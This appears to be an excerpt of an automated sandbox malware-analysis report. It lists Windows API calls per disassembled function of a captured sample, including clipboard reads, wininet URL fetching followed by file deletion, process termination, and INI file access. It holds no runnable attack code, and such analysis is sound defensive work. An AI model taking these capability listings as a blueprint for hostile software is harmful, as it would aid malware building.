Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427732, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 00430FC0: _strncpy.LIBCMT ref: 00431067
Part of subcall function 00430FC0: _strncpy.LIBCMT ref: 00431089
Part of subcall function 00430FC0: Shell_NotifyIcon.SHELL32 ref: 0043109F

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426674, Relevance: 9.2, APIs: 6, Instructions: 169time

APIs

Part of subcall function 00436750: EnumChildWindows.USER32(00000000,00436960,?), ref: 004367F1
Part of subcall function 00436750: EnumChildWindows.USER32(00000000,00436960,00000000), ref: 004368C7

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004277DE, Relevance: 9.2, APIs: 6, Instructions: 169time

APIs

Part of subcall function 00414090: __Stoull.NTSTC_LIBCMT ref: 004140C8

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427F2B, Relevance: 9.2, APIs: 6, Instructions: 169time

APIs

Part of subcall function 0046E3C0: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 0046E3E1
Part of subcall function 0046E3C0: WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0046E3F6
Part of subcall function 0046E3C0: WritePrivateProfileSectionA.KERNEL32(?,?,?), ref: 0046E442
Part of subcall function 0046E3C0: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0046E457

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427F07, Relevance: 9.2, APIs: 6, Instructions: 169time

APIs

Part of subcall function 0046E2A0: GetFullPathNameA.KERNEL32 ref: 0046E301
Part of subcall function 0046E2A0: GetPrivateProfileStringA.KERNEL32(?,?,ERROR,?,0000FFFF,?), ref: 0046E32B
Part of subcall function 0046E2A0: GetPrivateProfileSectionA.KERNEL32(?,?,0000FFFF,?), ref: 0046E36F
Part of subcall function 0046E2A0: GetPrivateProfileSectionNamesA.KERNEL32(?,0000FFFF,?), ref: 0046E389

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042653E, Relevance: 9.2, APIs: 6, Instructions: 168time

APIs

Part of subcall function 00434DE0: SendMessageTimeoutA.USER32(00000000,?,00000000,00000000,00000002,00001388,?), ref: 00434F4D
Part of subcall function 00434DE0: PostMessageA.USER32(?,?,00000000,00000000), ref: 00434FC0

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426DD2, Relevance: 9.2, APIs: 6, Instructions: 168time

APIs

Part of subcall function 0043CFD0: mciSendStringA.WINMM(?,00000000,00000000,00000000), ref: 0043D077
Part of subcall function 0043CFD0: mciSendStringA.WINMM(?,00000000,00000000,00000000), ref: 0043D0BF
Part of subcall function 0043CFD0: mciSendStringA.WINMM(?,00000000,00000000,00000000), ref: 0043D113
Part of subcall function 0043CFD0: mciSendStringA.WINMM(close cd wait,00000000,00000000,00000000), ref: 0043D122
Part of subcall function 0043CFD0: _strncpy.LIBCMT ref: 0043D14E
Part of subcall function 0043CFD0: SetVolumeLabelA.KERNEL32(?,?), ref: 0043D197

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042609F, Relevance: 9.2, APIs: 6, Instructions: 168time

APIs

Part of subcall function 00450930: LoadLibraryA.KERNEL32(wininet), ref: 0045093F
Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0045098C
Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00450998
Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 004509A6
Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 004509B4
Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 004509C0
Part of subcall function 00450930: FreeLibrary.KERNEL32(00000000), ref: 00450A5A
Part of subcall function 00450930: FreeLibrary.KERNEL32(00000000), ref: 00450A97
Part of subcall function 00450930: GetTickCount.KERNEL32 ref: 00450B5F
Part of subcall function 00450930: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00450B82
Part of subcall function 00450930: GetTickCount.KERNEL32 ref: 00450B98
Part of subcall function 00450930: GetTickCount.KERNEL32 ref: 00450BFD
Part of subcall function 00450930: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00450C20
Part of subcall function 00450930: GetTickCount.KERNEL32 ref: 00450C36
Part of subcall function 00450930: FreeLibrary.KERNEL32(00000000), ref: 00450C7D
Part of subcall function 00450930: DeleteFileA.KERNEL32(?), ref: 00450C98
Part of subcall function 00450930: FreeLibrary.KERNEL32(00000000), ref: 00450CC2

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426554, Relevance: 9.2, APIs: 6, Instructions: 168time

APIs

Part of subcall function 004350F0: GetCurrentProcessId.KERNEL32 ref: 00435149
Part of subcall function 004350F0: OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 00435186
Part of subcall function 004350F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00435195
Part of subcall function 004350F0: CloseHandle.KERNEL32(00000000), ref: 0043519E
Part of subcall function 004350F0: GetCurrentProcessId.KERNEL32 ref: 00435244
Part of subcall function 004350F0: OpenProcess.KERNEL32(00000200,00000000,00000000), ref: 0043525C
Part of subcall function 004350F0: SetPriorityClass.KERNEL32(00000000,00008000), ref: 0043526E
Part of subcall function 004350F0: GetTickCount.KERNEL32 ref: 004352B7
Part of subcall function 004350F0: GetTickCount.KERNEL32 ref: 004352F8

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

